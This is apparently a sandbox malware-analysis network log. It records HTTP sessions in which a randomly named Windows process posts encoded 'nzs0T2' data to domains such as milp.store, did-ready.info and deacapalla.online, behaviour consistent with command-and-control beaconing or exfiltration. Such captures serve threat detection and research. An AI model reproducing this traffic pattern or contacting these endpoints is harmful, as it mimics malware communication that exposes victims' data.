Jan 10, 2025 20:49:55.362905025 CET | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Jan 2025 19:49:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/8.1.30
Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
Jan 10, 2025 20:49:55.362938881 CET | 1236 | IN | Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
Jan 10, 2025 20:49:55.362951040 CET | 1236 | IN | Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
Jan 10, 2025 20:49:55.362962008 CET | 1236 | IN | Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
Jan 10, 2025 20:49:55.362974882 CET | 878 | IN | Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw


Session ID: 15
Source IP: 192.168.2.6
Source Port: 50002
Destination IP: 194.9.94.86
Destination Port: 80
PID: 2196
Process: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 20:49:57.195400953 CET | 1867 | OUT | POST /oqbp/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.milp.store
Origin: http://www.milp.store
Referer: http://www.milp.store/oqbp/
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 1247
User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                                                                                                                    Data Raw: 6e 7a 73 30 54 32 3d 71 58 31 44 33 45 42 37 77 77 42 4d 2f 57 46 52 52 5a 6a 69 50 79 33 56 6d 43 63 63 37 6e 46 6f 70 2f 6a 4c 50 56 37 41 41 42 4e 64 73 48 65 43 4c 4e 58 72 49 6d 7a 52 6e 49 57 75 64 31 37 77 41 70 66 59 57 69 4f 78 59 2b 6b 55 61 2b 4c 44 49 73 63 6a 59 72 48 70 51 66 41 41 63 61 67 74 45 71 75 63 4d 35 47 74 65 71 65 6a 79 39 4b 75 64 62 73 64 44 6f 33 30 4f 66 67 2b 6b 65 6c 76 32 41 64 6f 53 30 50 6b 53 64 37 4d 63 42 77 37 35 43 78 47 49 54 52 56 53 4f 46 59 49 49 72 4b 6d 44 55 54 36 69 59 6d 30 67 59 76 67 42 65 79 64 74 7a 58 63 66 49 79 45 47 4c 42 68 59 6e 6b 58 59 70 33 6d 51 44 34 77 6b 46 67 42 6c 30 57 36 4e 43 59 6a 53 32 31 65 31 73 37 31 39 32 55 62 32 56 55 41 56 45 57 43 6a 59 44 78 51 57 68 55 48 4c 56 77 31 66 67 50 61 78 45 41 5a 76 73 76 30 49 59 6c 73 51 37 66 31 61 7a 77 4b 78 39 42 58 47 39 6d 2b 65 78 34 64 67 66 6f 7a 59 4d 61 32 61 62 71 56 57 50 31 59 77 32 72 44 4d 44 43 57 43 36 6c 44 30 58 6e 6a 38 54 42 65 56 36 77 39 48 5a 48 2b 47 76 6b 44 37 [TRUNCATED]
Data Ascii: nzs0T2=[TRUNCATED]
Jan 10, 2025 20:49:57.836009026 CET | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Jan 2025 19:49:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/8.1.30
Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
Jan 10, 2025 20:49:57.836025953 CET | 1236 | IN | Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
Jan 10, 2025 20:49:57.836033106 CET | 1236 | IN | Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
Jan 10, 2025 20:49:57.836039066 CET | 1236 | IN | Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
Jan 10, 2025 20:49:57.836047888 CET | 878 | IN | Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    16192.168.2.650004194.9.94.86802196C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 10, 2025 20:49:59.736903906 CET581OUTGET /oqbp/?nzs0T2=nVdj0w1j4FwXyGo+Obq+FyeO6yYPj1Biv/jBCQDtLkRj70mDH/TDAXa41L+hW2L/B4b9RwzGZeA1aKeiLPIgFZPHXdsTU40dEdaTH5HUY4e23s7HRqJoCIa7IuMIjt9j0jZPQBo=&mLFl=BXYPt2lXBpi8Dj HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.milp.store
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                                                                                                                    Jan 10, 2025 20:50:00.378561974 CET1236INHTTP/1.1 200 OK
                                                                                                                    Server: nginx
                                                                                                                    Date: Fri, 10 Jan 2025 19:50:00 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/8.1.30
                                                                                                                    Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
Jan 10, 2025 20:50:00.378587961 CET | 224 | IN | Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.
Jan 10, 2025 20:50:00.378602028 CET | 1236 | IN | Data Ascii: 0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/responsive/styles/reset.css" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/shared/style/
Jan 10, 2025 20:50:00.378614902 CET | 1236 | IN | Data Ascii: gin to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=login">Loopia Customer zone</a> and actualize your plan.</p> <div class="divider"></div>
Jan 10, 2025 20:50:00.378626108 CET | 448 | IN | Data Ascii: S, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=dns">Read more at loopia.co
Jan 10, 2025 20:50:00.378638983 CET | 1236 | IN | Data Ascii: et started with your website, email, blog and online store.</p><p><ul><li><a href="https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=wordpress">Create your websi
Jan 10, 2025 20:50:00.378650904 CET | 206 | IN | Data Ascii: loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb">Contact us</a></p></span></div>... /END #footer --></div>... /END .content --></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.6 | 50005 | 194.245.148.189 | 80 | 2196 | C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 20:50:05.437649965 CET | 842 | OUT | POST /89qa/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.did-ready.info
Origin: http://www.did-ready.info
Referer: http://www.did-ready.info/89qa/
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 211
User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
Data Ascii: nzs0T2=5rqKyjbkg7enKDFTOIuKAArUm/OTpWYmU1/0joyPf2fY2mxlRgHIRPyxPZw7fNxYBMgBIm/OGYzRLnxVZH1wMXnjPew8w0a+F1XKf+1QYfJ+ZlWCmym60V2hRn4BiHvJGnEwZZ5+JSxlzRC/VAzGJ35zZmQsF+FZOTEZE9in4P2T4rtsbLIHANB9J2f8hKUzGw5EXmQAuZ9+
Jan 10, 2025 20:50:06.041709900 CET | 725 | IN | HTTP/1.1 403 Forbidden
Server: nginx
Date: Fri, 10 Jan 2025 19:50:05 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.6 | 50006 | 194.245.148.189 | 80 | 2196 | C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 20:50:07.991530895 CET | 866 | OUT | POST /89qa/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.did-ready.info
Origin: http://www.did-ready.info
Referer: http://www.did-ready.info/89qa/
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 235
User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
Data Ascii: nzs0T2=5rqKyjbkg7enYxRTIr2KQQrXqfOT+GYiU1z0jqDEeDvY1D1lQhHIWPyxE5w6RtxtBMsJIkbOGYXRLnhVYwBxNHnlE+w6vka+F1XKf/QYYbl+ZVGCmXK9912uYH4Bonv3GnEoZbNYJQ5lzUG/VRzJD351HWRhUsQNBDNCacix7Pb35dw2H4IkSdh/J0HOhqUZEwBEFxcnhtYdayKWB943D3x7dwJBL6+7cA==
Jan 10, 2025 20:50:08.595400095 CET | 725 | IN | HTTP/1.1 403 Forbidden
Server: nginx
Date: Fri, 10 Jan 2025 19:50:08 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.6 | 50007 | 194.245.148.189 | 80 | 2196 | C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 20:50:10.539935112 CET | 1879 | OUT | POST /89qa/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.did-ready.info
Origin: http://www.did-ready.info
Referer: http://www.did-ready.info/89qa/
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 1247
User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
Data Ascii: nzs0T2= [TRUNCATED]
Jan 10, 2025 20:50:11.158746004 CET | 725 | IN | HTTP/1.1 403 Forbidden
Server: nginx
Date: Fri, 10 Jan 2025 19:50:11 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.6 | 50008 | 194.245.148.189 | 80 | 2196 | C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 20:50:13.080565929 CET | 585 | OUT | GET /89qa/?mLFl=BXYPt2lXBpi8Dj&nzs0T2=0pCqxWaHoeLxNwZtE4rbCif976qK0EABSkz9gYzxYmn//CJHUgPOWYHQR+claPVZDeQXO3fZA6HYGFtXbggvb1fmL/sutHarBSn3QusyefFvRxXanRf+9ESPTUwnwk3mbGErQuw= HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Host: www.did-ready.info
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
Jan 10, 2025 20:50:13.689943075 CET | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Jan 2025 19:50:13 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 1840
Last-Modified: Tue, 04 Apr 2017 13:56:46 GMT
Connection: close
ETag: "58e3a61e-730"
Accept-Ranges: bytes
Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> ... The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags --> <meta name="description" content=""> <meta name="author" content=""> <meta http-equiv="refresh" content="5;url=/" /> <link rel="icon" href="../../favicon.ico"> <title>The requested page does not exist or is temporarily not available</title> ... Bootstrap core CSS --> <link href="./css/bootstrap.min.css" rel="stylesheet"> ... Custom styles for this template --> <link href="./css/parkingpage.css" rel="stylesheet"> </head> <body> <div class="container-fluid"> <div class="header clearfix"> <h3 class="text-muted"><img src="./images/JokerLogo2x.png"></h3> </div> </div><div class="
Jan 10, 2025 20:50:13.689954042 CET | 846 | IN | Data Ascii: container"> <div class="jumbotron"> <h1 class="display-3">404 - page not found</h1> <p class="lead">The page that you have requested may have moved or does not exist. Please check the URL for proper spelling and capitaliz


                                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                     21 | 192.168.2.6 | 50009 | 208.91.197.27 | 80 | 2196 | C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe
                                                                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                                                                     Jan 10, 2025 20:50:27.761631966 CET | 851 | OUT | POST /sdkp/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.deacapalla.online
                                                                                                                    Origin: http://www.deacapalla.online
                                                                                                                    Referer: http://www.deacapalla.online/sdkp/
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 211
                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                                                                                                                    Data Raw: 6e 7a 73 30 54 32 3d 64 30 57 30 35 36 42 62 66 2b 43 58 62 71 54 53 33 34 62 31 4b 62 59 51 7a 70 34 45 74 6b 39 50 5a 77 31 50 44 67 59 6b 73 43 58 50 5a 46 38 36 4a 6e 47 31 54 59 4c 2f 59 77 39 6b 62 71 51 72 6e 7a 44 71 6f 39 51 79 30 33 39 4a 32 65 48 55 79 78 67 5a 4a 45 4d 73 6b 6c 59 6c 6d 45 64 6d 2f 70 6a 4b 52 30 31 66 47 48 46 77 49 34 75 50 34 51 5a 77 32 30 78 75 77 35 34 67 32 42 47 38 78 77 44 77 64 6d 49 4f 46 77 41 78 30 59 6b 4e 43 42 4c 43 4e 49 79 41 49 4c 4e 7a 37 50 59 7a 78 53 2b 64 72 4f 47 73 6e 75 76 65 6b 34 35 42 42 78 47 38 65 64 51 46 2f 39 72 56 65 54 43 49 63 4d 7a 48 57 44 61 77 77 55 68 41
                                                                                                                    Data Ascii: nzs0T2=d0W056Bbf+CXbqTS34b1KbYQzp4Etk9PZw1PDgYksCXPZF86JnG1TYL/Yw9kbqQrnzDqo9Qy039J2eHUyxgZJEMsklYlmEdm/pjKR01fGHFwI4uP4QZw20xuw54g2BG8xwDwdmIOFwAx0YkNCBLCNIyAILNz7PYzxS+drOGsnuvek45BBxG8edQF/9rVeTCIcMzHWDawwUhA


                                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                     22 | 192.168.2.6 | 50010 | 208.91.197.27 | 80 | 2196 | C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe
                                                                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                                                                     Jan 10, 2025 20:50:30.399625063 CET | 875 | OUT | POST /sdkp/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.deacapalla.online
                                                                                                                    Origin: http://www.deacapalla.online
                                                                                                                    Referer: http://www.deacapalla.online/sdkp/
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 235
                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                                                                                                                    Data Raw: 6e 7a 73 30 54 32 3d 64 30 57 30 35 36 42 62 66 2b 43 58 62 4c 44 53 37 2f 76 31 50 37 59 52 38 4a 34 45 34 30 39 4c 5a 77 35 50 44 68 64 38 76 77 7a 50 61 67 41 36 48 47 47 31 66 34 4c 2f 54 51 39 6c 57 4b 51 67 6e 7a 66 55 6f 2f 55 79 30 33 70 4a 32 63 66 55 7a 47 38 59 49 55 4d 75 73 46 59 6a 6f 6b 64 6d 2f 70 6a 4b 52 77 64 35 47 48 64 77 49 4a 2b 50 37 31 74 78 6f 45 78 74 6b 70 34 67 79 42 48 31 78 77 43 56 64 69 70 56 46 79 6f 78 30 64 59 4e 43 51 4c 42 44 49 79 47 57 37 4d 6a 39 50 64 68 2f 43 4c 74 69 34 75 6d 33 38 76 6d 68 4f 6b 62 64 43 47 66 4d 4e 77 48 2f 2f 7a 6e 65 7a 43 69 65 4d 4c 48 45 55 57 58 2f 67 45 6a 7a 2b 34 72 48 6a 74 4f 43 46 4d 68 72 75 30 48 54 2b 38 36 77 51 3d 3d
                                                                                                                    Data Ascii: nzs0T2=d0W056Bbf+CXbLDS7/v1P7YR8J4E409LZw5PDhd8vwzPagA6HGG1f4L/TQ9lWKQgnzfUo/Uy03pJ2cfUzG8YIUMusFYjokdm/pjKRwd5GHdwIJ+P71txoExtkp4gyBH1xwCVdipVFyox0dYNCQLBDIyGW7Mj9Pdh/CLti4um38vmhOkbdCGfMNwH//znezCieMLHEUWX/gEjz+4rHjtOCFMhru0HT+86wQ==


                                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                     23 | 192.168.2.6 | 50011 | 208.91.197.27 | 80 | 2196 | C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe
                                                                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                                                                     Jan 10, 2025 20:50:33.071135998 CET | 1888 | OUT | POST /sdkp/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.deacapalla.online
                                                                                                                    Origin: http://www.deacapalla.online
                                                                                                                    Referer: http://www.deacapalla.online/sdkp/
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 1247
                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
